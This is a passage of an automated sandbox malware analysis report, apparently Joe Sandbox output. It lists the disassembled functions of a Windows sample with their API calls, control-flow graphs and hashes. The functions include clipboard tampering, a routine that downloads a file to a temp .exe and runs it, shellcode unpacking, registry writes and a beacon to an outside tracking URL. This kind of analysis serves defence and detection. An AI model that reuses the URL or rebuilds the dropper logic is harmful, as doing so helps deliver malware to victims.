                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00401909
                                                                                                                                                                                                                                            • SetClipboardData.USER32(00000001,00000000), ref: 00401912
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 00401919
                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0040193D
                                                                                                                                                                                                                                            • Sleep.KERNEL32(000002D2), ref: 00401948
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                                                                                                                                                                                                            • String ID: i
                                                                                                                                                                                                                                            • API String ID: 1583243082-3865851505
                                                                                                                                                                                                                                            • Opcode ID: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                            • Instruction ID: e3fffec023ebc7079252f179b6fac15abd8ab57f1bda789313b6278f228a63c7
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3890b0babb8c445354b39205077755c2ed8c63edb095b033559c6878a2d81ccf
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 26510531C00384DAE7119B64EC567AD7774FF29306F04523AE805721B3EB789A85C75D
                                                                                                                                                                                                                                            Function 004029F4 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A17
                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A2D
                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00000105,?), ref: 00402A49
                                                                                                                                                                                                                                            • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A5F
                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402A98
                                                                                                                                                                                                                                            • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AD4
                                                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402AF1
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402B07
                                                                                                                                                                                                                                            • ShellExecuteExW.SHELL32(?), ref: 00402B68
                                                                                                                                                                                                                                            • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B7D
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00402B89
                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00402B92
                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00402B95
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                            • String ID: .exe$<$ShareScreen
                                                                                                                                                                                                                                            • API String ID: 3323492106-493228180
                                                                                                                                                                                                                                            • Opcode ID: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                            • Instruction ID: e60cee4ce2238679e1fb1751da2f8ba8583e6b9327599976f3985bfb1b161874
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f58ca3bd5773c85defe3f015c49e34db42d2945e511aafa3139439615266b492
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4741437190021CAFEB209F649D85FEAB7BCFF05745F0081F6A549E2190DEB49E858FA4
                                                                                                                                                                                                                                            Function 00B0A2CE Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00B0A2F6
                                                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,00000224), ref: 00B0A316
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745494815.0000000000B09000.00000040.00000020.00020000.00000000.sdmp, Offset: 00B09000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_b09000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 3833638111-0
                                                                                                                                                                                                                                            • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                            • Instruction ID: 5e29aac8477b810b8172aa99dd5f6e002ea8b7c190f2ae1f61257ecf6ef6b7da
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BF09632200711ABD7203BF5988DFAEBAE8EF49725F100979E642D14C0DB74EC454A66
                                                                                                                                                                                                                                            Function 0043D03C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 74 43d03c-43d06c call 43cd9f 77 43d087-43d093 call 43977e 74->77 78 43d06e-43d079 call 42eab6 74->78 83 43d095-43d0aa call 42eab6 call 42eac9 77->83 84 43d0ac-43d0f5 call 43cd0a 77->84 85 43d07b-43d082 call 42eac9 78->85 83->85 93 43d162-43d16b GetFileType 84->93 94 43d0f7-43d100 84->94 95 43d35e-43d364 85->95 96 43d1b4-43d1b7 93->96 97 43d16d-43d19e GetLastError call 42ea93 CloseHandle 93->97 99 43d102-43d106 94->99 100 43d137-43d15d GetLastError call 42ea93 94->100 103 43d1c0-43d1c6 96->103 104 43d1b9-43d1be 96->104 97->85 111 43d1a4-43d1af call 42eac9 97->111 99->100 105 43d108-43d135 call 43cd0a 99->105 100->85 108 43d1ca-43d218 call 4396c7 103->108 109 43d1c8 103->109 104->108 105->93 105->100 116 43d21a-43d226 call 43cf1b 108->116 117 43d228-43d24c call 43cabd 108->117 109->108 111->85 116->117 123 43d250-43d25a call 4335cd 116->123 124 43d25f-43d2a2 117->124 125 43d24e 117->125 123->95 127 43d2c3-43d2d1 124->127 128 43d2a4-43d2a8 124->128 125->123 131 43d2d7-43d2db 127->131 132 43d35c 127->132 128->127 130 43d2aa-43d2be 128->130 130->127 131->132 133 43d2dd-43d310 CloseHandle call 43cd0a 131->133 132->95 136 43d312-43d33e GetLastError call 42ea93 call 439890 133->136 137 43d344-43d358 133->137 136->137 137->132
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                              • Part of subcall function 0043CD0A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0E5,?,?,00000000,?,0043D0E5,00000000,0000000C), ref: 0043CD27
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0043D150
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0043D157
                                                                                                                                                                                                                                            • GetFileType.KERNEL32(00000000), ref: 0043D163
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0043D16D
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0043D176
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0043D196
                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 0043D2E0
                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0043D312
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0043D319
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                            • String ID: H
                                                                                                                                                                                                                                            • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                            • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                            • Instruction ID: 375b4e16163f674ce9da34a4ad13212d62ba31a6b33a52f993f1a67b08af40b6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ACA13632E101149FCF19AF68EC517AE7BA1AF0A324F14115EF8159B391D6389D02CB5A
                                                                                                                                                                                                                                            Function 00432F29 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 142 432f29-432f39 143 432f53-432f55 142->143 144 432f3b-432f4e call 42eab6 call 42eac9 142->144 146 432f5b-432f61 143->146 147 4332bd-4332ca call 42eab6 call 42eac9 143->147 161 4332d5 144->161 146->147 150 432f67-432f92 146->150 166 4332d0 call 42a59d 147->166 150->147 151 432f98-432fa1 150->151 154 432fa3-432fb6 call 42eab6 call 42eac9 151->154 155 432fbb-432fbd 151->155 154->166 159 432fc3-432fc7 155->159 160 4332b9-4332bb 155->160 159->160 165 432fcd-432fd1 159->165 163 4332d8-4332dd 160->163 161->163 165->154 169 432fd3-432fea 165->169 166->161 171 433007-433010 169->171 172 432fec-432fef 169->172 175 433012-433029 call 42eab6 call 42eac9 call 42a59d 171->175 176 43302e-433038 171->176 173 432ff1-432ff7 172->173 174 432ff9-433002 172->174 173->174 173->175 179 4330a3-4330bd 174->179 205 4331f0 175->205 177 43303a-43303c 176->177 178 43303f-43305d call 4336a7 call 43346a * 2 176->178 177->178 215 43307a-4330a0 call 4347ee 178->215 216 43305f-433075 call 42eac9 call 42eab6 178->216 182 4330c3-4330d3 179->182 183 433191-43319a call 43d365 179->183 182->183 187 4330d9-4330db 182->187 194 43320d 183->194 195 43319c-4331ae 183->195 187->183 191 4330e1-433107 187->191 191->183 196 43310d-433120 191->196 198 433211-433229 ReadFile 194->198 195->194 200 4331b0-4331bf GetConsoleMode 195->200 196->183 201 433122-433124 196->201 203 433285-433290 GetLastError 198->203 204 43322b-433231 198->204 200->194 206 4331c1-4331c5 200->206 201->183 207 433126-433151 201->207 209 433292-4332a4 call 42eac9 call 42eab6 203->209 210 4332a9-4332ac 203->210 204->203 211 433233 204->211 213 4331f3-4331fd call 43346a 205->213 206->198 212 4331c7-4331e1 ReadConsoleW 206->212 207->183 214 433153-433166 207->214 209->205 222 4332b2-4332b4 210->222 223 4331e9-4331ef call 42ea93 210->223 218 433236-433248 211->218 220 4331e3 GetLastError 212->220 221 433202-43320b 212->221 213->163 214->183 225 433168-43316a 214->225 215->179 216->205 218->213 229 43324a-43324e 218->229 220->223 221->218 222->213 223->205 225->183 233 43316c-43318c 225->233 236 433250-433260 call 432c45 229->236 237 433267-433272 229->237 233->183 248 433263-433265 236->248 242 433274 call 432d95 237->242 243 43327e-433283 call 432a85 237->243 249 433279-43327c 242->249 243->249 248->213 249->248
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                            • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                            • Instruction ID: e6f917e7e92ba8bfc6e6230e9bcbcb6957f35208d34794f9861c257e27c575d5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 44C11670E04345AFDF11DFAAD841BAEBBB0BF0D305F14119AE815A7392C7389A41CB69
                                                                                                                                                                                                                                            Function 0249003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 250 249003c-2490047 251 2490049 250->251 252 249004c-2490263 call 2490a3f call 2490e0f call 2490d90 VirtualAlloc 250->252 251->252 267 249028b-2490292 252->267 268 2490265-2490289 call 2490a69 252->268 270 24902a1-24902b0 267->270 271 24902ce-24903c2 VirtualProtect call 2490cce call 2490ce7 268->271 270->271 272 24902b2-24902cc 270->272 279 24903d1-24903e0 271->279 272->270 280 2490439-24904b8 VirtualFree 279->280 281 24903e2-2490437 call 2490ce7 279->281 283 24904be-24904cd 280->283 284 24905f4-24905fe 280->284 281->279 288 24904d3-24904dd 283->288 285 249077f-2490789 284->285 286 2490604-249060d 284->286 291 249078b-24907a3 285->291 292 24907a6-24907b0 285->292 286->285 289 2490613-2490637 286->289 288->284 293 24904e3-2490505 LoadLibraryA 288->293 298 249063e-2490648 289->298 291->292 294 249086e-24908be LoadLibraryA 292->294 295 24907b6-24907cb 292->295 296 2490517-2490520 293->296 297 2490507-2490515 293->297 306 24908c7-24908f9 294->306 299 24907d2-24907d5 295->299 300 2490526-2490547 296->300 297->300 298->285 301 249064e-249065a 298->301 302 2490824-2490833 299->302 303 24907d7-24907e0 299->303 304 249054d-2490550 300->304 301->285 305 2490660-249066a 301->305 312 2490839-249083c 302->312 307 24907e2 303->307 308 24907e4-2490822 303->308 309 24905e0-24905ef 304->309 310 2490556-249056b 304->310 311 249067a-2490689 305->311 313 24908fb-2490901 306->313 314 2490902-249091d 306->314 307->302 308->299 309->288 315 249056d 310->315 316 249056f-249057a 310->316 317 249068f-24906b2 311->317 318 2490750-249077a 311->318 312->294 319 249083e-2490847 312->319 313->314 315->309 321 249059b-24905bb 316->321 322 249057c-2490599 316->322 323 24906ef-24906fc 317->323 324 24906b4-24906ed 317->324 318->298 325 2490849 319->325 326 249084b-249086c 319->326 333 24905bd-24905db 321->333 322->333 327 249074b 323->327 328 24906fe-2490748 323->328 324->323 325->294 326->312 327->311 328->327 333->304
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0249024D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3745958160.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_2490000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                            • String ID: cess$kernel32.dll
                                                                                                                                                                                                                                            • API String ID: 4275171209-1230238691
                                                                                                                                                                                                                                            • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                            • Instruction ID: 399dcb6eb3918c0fda0455d7dbc85658349493339161d9849fa38a55beedf806
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D2525874A01229DFDB64CF58C984BA9BBB1BF09314F1480DAE94DAB351DB30AE95CF14
                                                                                                                                                                                                                                            Function 00402C04 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 180networkCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C27
                                                                                                                                                                                                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                                                                                                                                                                                                              • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                                                                                                                                                                                                            • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E3A
                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00402E4B
                                                                                                                                                                                                                                            • InternetCloseHandle.WININET(00000000), ref: 00402E4E
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Internet$CloseHandleOpen_wcslen
                                                                                                                                                                                                                                            • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                            • API String ID: 3067768807-1501832161
                                                                                                                                                                                                                                            • Opcode ID: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                            • Instruction ID: 610146e9b537463af15e95cb977131b409bd75c1d6f6ac837d2bfbf99fd09ca4
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 89be1508a3bc8005e5e9602c7d60be0ea7129d63634688ee67e7a2662fb1427b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95515295E65344A9E320EFB0BC46B762378EF58712F10643BE518CB2F2E7B09944875E
                                                                                                                                                                                                                                            Function 004051D0 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Cnd_initstd::_$Cnd_waitMtx_initThrd_start
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 1687354797-0
                                                                                                                                                                                                                                            • Opcode ID: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                            • Instruction ID: 19e1887bebf86d68050debe7f629b0077f83fb22891cd3fd40adaf63da529dec
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a291ca2b74a2a079234bae36187643b4709f220aeabf3b9fcc979ead6e8bbad4
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A2214F72C042089ADF15EBE9D845BDEB7F8AF08318F14407FE544B72C2DB7C99448AA9
                                                                                                                                                                                                                                            Function 00405800 Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::_Cnd_initX.LIBCPMT ref: 0040581C
                                                                                                                                                                                                                                            • __Cnd_signal.LIBCPMT ref: 00405828
                                                                                                                                                                                                                                            • std::_Cnd_initX.LIBCPMT ref: 0040583D
                                                                                                                                                                                                                                            • __Cnd_do_broadcast_at_thread_exit.LIBCPMT ref: 00405844
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Cnd_initstd::_$Cnd_do_broadcast_at_thread_exitCnd_signal
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2059591211-0
                                                                                                                                                                                                                                            • Opcode ID: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                            • Instruction ID: 35483bd65d518524af9bc0c336ffe1903f30c86e9e3fc9c48514fd729a934722
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75d2ec5a84d6058dd22c20c78519f5ebb85b54958e4003f0e2117dcdaee44c85
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6BF082324007009BE7317762C807B1A77A0AF0031DF10883FF496B69E2CFBDA8544A9D
                                                                                                                                                                                                                                            Function 0042DFC0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 38threadCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(00457910,00000010,00000003,00431F5D), ref: 0042DFD3
                                                                                                                                                                                                                                            • ExitThread.KERNEL32 ref: 0042DFDA
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorExitLastThread
                                                                                                                                                                                                                                            • String ID: F(@
                                                                                                                                                                                                                                            • API String ID: 1611280651-2698495834
                                                                                                                                                                                                                                            • Opcode ID: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                            • Instruction ID: 20c869b795d3320417ca4c19bdea27327a86df913c4cc91a2df8cdb03a1abfe5
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 05a6bf9322938420f326034e00ba90610ba59fb7b5f4eb19846d64da3dd64c95
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E7F0C274A00614AFDB14AFB2E80ABAE3B70FF09715F10056EF4015B392CB796A55DB6C
                                                                                                                                                                                                                                            Function 0042E114 Relevance: 4.6, APIs: 3, Instructions: 54threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 435 42e114-42e11f 436 42e121-42e133 call 42eac9 call 42a59d 435->436 437 42e135-42e148 call 42e0cb 435->437 453 42e185-42e188 436->453 443 42e176 437->443 444 42e14a-42e167 CreateThread 437->444 447 42e178-42e184 call 42e03d 443->447 445 42e189-42e18e 444->445 446 42e169-42e175 GetLastError call 42ea93 444->446 451 42e190-42e193 445->451 452 42e195-42e197 445->452 446->443 447->453 451->452 452->447
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CreateThread.KERNEL32(?,?,Function_0002DFC0,00000000,?,?), ref: 0042E15D
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,0040CF0E,00000000,00000000,?,?,00000000,?), ref: 0042E169
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0042E170
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CreateErrorLastThread__dosmaperr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2744730728-0
                                                                                                                                                                                                                                            • Opcode ID: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                            • Instruction ID: dd8ab9647f30f5a835e394039e4629bb1c045fd9997365d20d72d2d3bd3a9304
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b840c7f841b7cccdda56e05bcd555d2476c4531c994d68046d65894b3d724d0
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D601D236200239BBDB159FA3EC059AF7B6AEF81720F40003AF90587210DB358922C7A8
                                                                                                                                                                                                                                            Function 00434755 Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 456 434755-43476d call 439921 459 434780-434796 SetFilePointerEx 456->459 460 43476f-434774 call 42eac9 456->460 462 4347a7-4347b1 459->462 463 434798-4347a5 GetLastError call 42ea93 459->463 467 43477a-43477e 460->467 466 4347b3-4347c8 462->466 462->467 463->467 468 4347cd-4347d2 466->468 467->468
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,0040DDD5,00000000,00000002,0040DDD5,00000000,?,?,?,00434804,00000000,00000000,0040DDD5,00000002), ref: 0043478E
                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,00434804,00000000,00000000,0040DDD5,00000002,?,0042C161,?,00000000,00000000,00000001,?,0040DDD5,?,0042C216), ref: 00434798
                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 0043479F
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.3741235829.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_hpEAJnNwCB.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 2336955059-0
                                                                                                                                                                                                                                            • Opcode ID: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                            • Instruction ID: bcc915797d3e420762720933ca2114d92cc1cd6946a03aaf12616f5971efc3d8
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0f8939188b6fdc8a7da50d1b405e1129083f9e2b96a50d0a3cd5949e7845d65d
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 01016836710114ABCB148FAADC059EE7B29EFCA730F24020AF81487290EB35ED118B98
                                                                                                                                                                                                                                            Function 00402BAD Relevance: 4.5, APIs: 3, Instructions: 41registryCOMMON
                                                                                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                            control_flow_graph 470 402bad-402bd9 RegCreateKeyExW 471 402bdb-402bed RegSetValueExW 470->471 472 402bef-402bf2 470->472 471->472 473 402bf4-402bf7 RegCloseKey 472->473 474 402bfd-402c03 472->474 473->474
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegCreateKeyExW.KERNEL32(80000001,?,00000000,00000000,00000000,000F003F,00000000,?,00000000), ref: 00402BCF
